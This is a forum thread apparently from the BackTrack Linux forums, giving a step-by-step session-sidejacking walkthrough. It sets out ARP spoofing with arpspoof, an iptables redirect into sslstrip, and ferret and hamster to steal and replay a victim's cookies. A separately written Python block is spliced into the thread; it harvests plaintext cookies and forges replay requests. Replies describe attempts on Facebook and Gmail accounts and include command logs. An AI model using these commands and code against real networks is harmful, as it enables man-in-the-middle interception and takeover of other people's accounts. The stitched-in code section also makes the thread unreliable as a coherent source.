Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3288793
Download video: http://www.mediafire.com/?3pz9w85jd4s328q
What is this?
This video demos how to do "Session Sidejacking". Sidejacking is where you clone your target's cookies, therefore you're "sharing" their identity for that account (without ever knowing the username or password)!
What do I need?
> arpspoof
> sslstrip
> Hamster (and Ferret)
*all in BackTrack 4 Final*
Software
Name: arpspoof (DSniff)
Version: 2.3
Home Page: http://www.monkey.org/~dugsong/dsniff/
Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
Name: sslstrip
Version: 0.6
Home Page: http://www.thoughtcrime.org/software...rip/index.html
Download Link: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz
Name: Hamster Sidejacking Tool
Version: 2.0
Home Page: http://hamster.erratasec.com/
Download Link: http://hamster.erratasec.com/downloa...er-2.0.0.tar.z
Commands:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.104 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f
/pentest/sniffers/hamster/ferret -i eth0
/pentest/sniffers/hamster/hamster
Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
Konqueror -> http://hamster
Notes:
Song: Soulwax - Bonkers (As Heard On Radio Soulwax Edit)
Video length: 2:39
Capture length: 3:42
Blog Post: http://g0tmi1k.blogspot.com/2010/03/video-session-sidejacking-ferret-and.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1877-%5Bvideo%5D-session-sidejacking-ferret-hamster.html
Last edited by g0tmi1k; 03-05-2011 at 03:03 PM.
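The core of what the ferret + hamster pair does in the video, reduced to a few functions, as an added example (this is not ferret's or hamster's own code, and not g0tmi1k's). The packets are constructed wire traffic standing in for what ferret sees on the attacker's interface once arpspoof, the iptables REDIRECT and sslstrip are in place; the victim IP, server IPs and hostnames are assumptions. It harvests every Cookie header sent in plaintext (ferret's job), builds the replay request that hamster's proxy would send with the stolen cookies, and also flags cookies the server set with the Secure attribute: those a browser will not send over the downgraded http:// page, which is the check to run when a target keeps bouncing you back to its login page instead of being sidejackable.

```python
import re
from collections import defaultdict

# Constructed wire traffic (not a real capture) as ferret would see it on the
# attacker's interface: the victim (192.168.1.107) only ever speaks plaintext
# HTTP after sslstrip has rewritten the site's https:// links, so any cookie its
# browser is willing to send over HTTP crosses the wire in the clear.
# Hostnames and IPs are assumptions for the example.
VICTIM = "192.168.1.107"
SNIFFED_PACKETS = [
    (VICTIM, "93.184.216.34",
     b"GET /home HTTP/1.1\r\nHost: www.example-social.com\r\n"
     b"User-Agent: Mozilla/5.0\r\nCookie: sid=4f3c2d; lang=en\r\n\r\n"),
    ("93.184.216.34", VICTIM,
     b"HTTP/1.1 200 OK\r\nSet-Cookie: sid=4f3c2d; Path=/; HttpOnly\r\n"
     b"Content-Length: 0\r\n\r\n"),
    (VICTIM, "198.51.100.7",
     b"GET /mail/ HTTP/1.1\r\nHost: mail.example-webmail.com\r\n"
     b"User-Agent: Mozilla/5.0\r\n\r\n"),
    ("198.51.100.7", VICTIM,
     b"HTTP/1.1 302 Found\r\nLocation: https://mail.example-webmail.com/login\r\n"
     b"Set-Cookie: GX=9a8b7c; Path=/; Secure\r\nContent-Length: 0\r\n\r\n"),
]


def parse_http(raw):
    """Split a raw HTTP message into (start line, [(header name, value), ...])."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def harvest_cookies(packets):
    """What ferret does: collect every Cookie header seen in plaintext requests,
    keyed by (victim IP, Host) so one victim's sessions stay separate from another's."""
    jar = defaultdict(dict)
    for src, _dst, raw in packets:
        start, headers = parse_http(raw)
        if start.startswith("HTTP/"):
            continue  # a response, not a request
        hdr = dict(headers)
        host = hdr.get("host")
        cookie_hdr = hdr.get("cookie")
        if not host or not cookie_hdr:
            continue
        for pair in cookie_hdr.split(";"):
            name, _, value = pair.strip().partition("=")
            if name:
                jar[(src, host)][name] = value
    return dict(jar)


def secure_cookies_seen(packets):
    """Cookies the server set with the Secure attribute. Even after sslstrip has
    downgraded the page to http://, the browser will not send these over HTTP,
    so they never show up in the jar: the target just redirects back to login."""
    server_to_host = {}  # server IP -> Host header of the request that reached it
    found = {}
    for src, dst, raw in packets:
        start, headers = parse_http(raw)
        hdr = dict(headers)
        if not start.startswith("HTTP/"):
            if "host" in hdr:
                server_to_host[dst] = hdr["host"]
            continue
        host = server_to_host.get(src, src)
        for name, value in headers:
            if name != "set-cookie":
                continue
            parts = [p.strip() for p in value.split(";")]
            cookie_name = parts[0].partition("=")[0]
            if any(p.lower() == "secure" for p in parts[1:]):
                found.setdefault(host, set()).add(cookie_name)
    return found


def replay_request(jar, victim_ip, host, path="/"):
    """What hamster's proxy does: send our own request carrying the victim's
    cookies, so the server treats us as that session."""
    cookies = jar.get((victim_ip, host))
    if not cookies:
        raise KeyError("no cookies harvested for %s at %s" % (victim_ip, host))
    cookie_hdr = "; ".join("%s=%s" % kv for kv in cookies.items())
    return ("GET %s HTTP/1.1\r\nHost: %s\r\nCookie: %s\r\n\r\n"
            % (path, host, cookie_hdr)).encode("latin-1")


if __name__ == "__main__":
    jar = harvest_cookies(SNIFFED_PACKETS)
    for (ip, host), cookies in jar.items():
        print("sidejackable: %s @ %s -> %s" % (ip, host, cookies))
    for host, names in secure_cookies_seen(SNIFFED_PACKETS).items():
        print("not sidejackable over HTTP (Secure flag): %s -> %s" % (host, sorted(names)))
    print(replay_request(jar, VICTIM, "www.example-social.com", "/home").decode())
```

In the constructed traffic the social site's sid cookie is sent in the clear and can be replayed, while the webmail host answers the downgraded request with a redirect to https:// and a Secure-flagged cookie, so nothing usable is ever harvested for it.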
Great video, thank you for posting this. I am very interested in trying this out myself.
Well done!
Have you been able to do this against a victim logging into Facebook/MySpace? Just curious, as when I try it, it gives a ton of cookies and none seem to work. Thanks
What software do you use for creating the videos ?
Thanks for sharing, great video, keep going.
I was able to successfully sidejack my Facebook account. However, I am having issues with sidejacking Gmail. The victim I used was an XP laptop. I tried to log in to Gmail on the XP machine; the Gmail login URL was directed to unsecured HTTP. In my attempts it just kept forcing me to re-authenticate, and I would never get into my Gmail to begin with.
Any ideas? Is Gmail not allowing unencrypted logins now?
g0tmi1k, any idea why I get the message "live(1): LLC:control: unparsed value: 0x4e (78)" when I run the command "/pentest/sniffers/hamster/ferret -i wlan0"?
Hi, sorry for the late reply. I am using the persistent live CD BT4 Final; I have updated everything recently using the apt-get command.
I fixed the LLC error by changing to my Alfa card rather than using my internal wireless card.
Here is my log:
1st window:
echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~# arpspoof -i wlan1 -t 192.168.1.107 192.168.1.117
0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34
0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34
2nd window:
root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
root@bt:~# sslstrip -p -k -f
sslstrip 0.6 by Moxie Marlinspike running...
3rd window: (this is where it starts going wrong, I think)
-- Sniffing on interface "wlan1"
SNIFFING: wlan1
LINKTYPE: 1 Ethernet
ID-IP=[192.168.1.117], macaddr=[00:c0:ca:37:a8:34]
ID-MAC=[00:c0:ca:37:a8:34], ip=[192.168.1.117]
Traffic seen
ID-IP=[192.168.1.107], macaddr=[00:23:6c:89:04:73]
ID-MAC=[00:23:6c:89:04:73], ip=[192.168.1.107]
ID-IP=[192.168.1.1], Device="UPnP", LOCATION="http://192.168.1.1:5000/rootDesc.xml"
ID-IP=[192.168.1.1], Device="UPnP", SOFTWARE="Tomato UPnP/1.0 MiniUPnPd/1.4"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="upnp:rootdevice"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:InternetGatewayDevice:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANConnectionDevice:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANDevice:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANIPConnection:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANPPPConnection:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:Layer3Forwarding:1"
ID-IP=[192.168.1.1], macaddr=[00:1c:10:11:bc:17]
ID-MAC=[00:1c:10:11:bc:17], ip=[192.168.1.1]
proto="DNS", query="A", ip.src=[192.168.1.117], name="rcv-srv22.inplay.tubemogul.com"
ID-DNS="rcv-srv22.inplay.tubemogul.com", address=[174.129.26.97]
ID-IP=[192.168.1.117], User-Agent="Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)"
proto="HTTP", op="GET", Host="rcv-srv22.inplay.tubemogul.com", URL="/StreamReceiver/services"
4th window :
root@bt:~# /pentest/sniffers/hamster/hamster
--- HAMPSTER 2.0 side-jacking tool ---
begining thread
Set browser to use proxy BackTrack Linux
DEBUG: set_ports_option(1234)
DEBUG: mg_open_listening_port(1234)
Proxy: listening on 127.0.0.1:1234
GET /StreamReceiver/services
GET /StreamReceiver/services HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)
Accept: text/html, image/jpeg, image/png, text/*, image/*, */*
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Host: rcv-srv22.inplay.tubemogul.com
Connection: close
Referer: http://static.inplay.tubemogul.com/c...erID=B-4SJ-WF8
recv failed: Connection reset by peer
recv failed: Connection reset by peer
I have no idea why it says "recv failed: Connection reset by peer"...
Basically, once I got Hamster up and running, I proceeded to use my 2nd laptop, which runs Windows 7; I used Firefox to log into my Gmail account, then refreshed Konqueror on my BT4 machine, but didn't see the log for that computer in Konqueror.
(Yes, both of my computers are connected to the same network.)
Hope you can help =)